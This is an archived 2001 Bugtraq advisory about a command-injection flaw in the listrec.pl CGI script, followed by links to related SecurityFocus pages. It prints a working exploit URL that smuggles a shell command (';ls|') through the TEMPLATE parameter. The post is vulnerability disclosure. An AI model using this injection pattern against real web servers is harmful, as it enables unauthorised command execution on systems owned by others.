Textor Webmasters Ltd (listrec.pl)

From: Alexey Sintsov (don_huan@xakep.ru)
Date: 09/12/01 

Date: 12 Sep 2001 04:01:24 -0000
Message-ID: <20010912040124.2862.qmail@securityfocus.com>
From: Alexey Sintsov <don_huan@xakep.ru>
To: bugtraq@securityfocus.com
Subject: Textor Webmasters Ltd (listrec.pl)

Last update (of listrec.pl) Jon Wright 11/11/1998.

This script has vulnerability (does not filter input of the
user) which allows to carry out commands from
WebServer.

EXPLOIT:
www.server.com/cgi-bin/common/listrec.pl?
APP=qmh-news&TEMPLATE=;ls|

XP-TEAM

Relevant Pages

  • SecurityFocus Microsoft Newsletter #83
    ... MICROSOFT VULNERABILITY SUMMARY ... Microsoft IIS CodeBrws.ASP Source Code Disclosure Vulnerability ... Microsoft Internet Explorer History List Script Injection ... Microsoft Windows 2000 Lanman Denial of Service Vulnerability ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter #84
    ... The most critical piece of vulnerability assessment is remediation. ... MICROSOFT VULNERABILITY SUMMARY ... IcrediBB Script Injection Vulnerability ... WorkforceROI XPede Unprotected Administrative Facilities... ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter #91
    ... SecurityFocus Microsoft Newsletter #91 ... Multiple Bugzilla Security Vulnerabilities ... Geeklog pid CGI Variable SQL Injection Vulnerability ... Geeklog Calendar Event Form Script Injection Vulnerability ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter #109
    ... MICROSOFT VULNERABILITY SUMMARY ... PHPRank Banner Script Code Injection Vulnerability ... PHPNuke Multiple Script Code Filtering Vulnerabilities ...
    (Focus-Microsoft)
  • HP Web JetAdmin vulnerabilities.
    ... this vulnerability is not a critical risk. ... Luckily these directories do not have execute permissions but, this script, ... create files in the Administrators startup folder. ... it may be possible to directly inject the hts scripting ...
    (Bugtraq)
Quantcast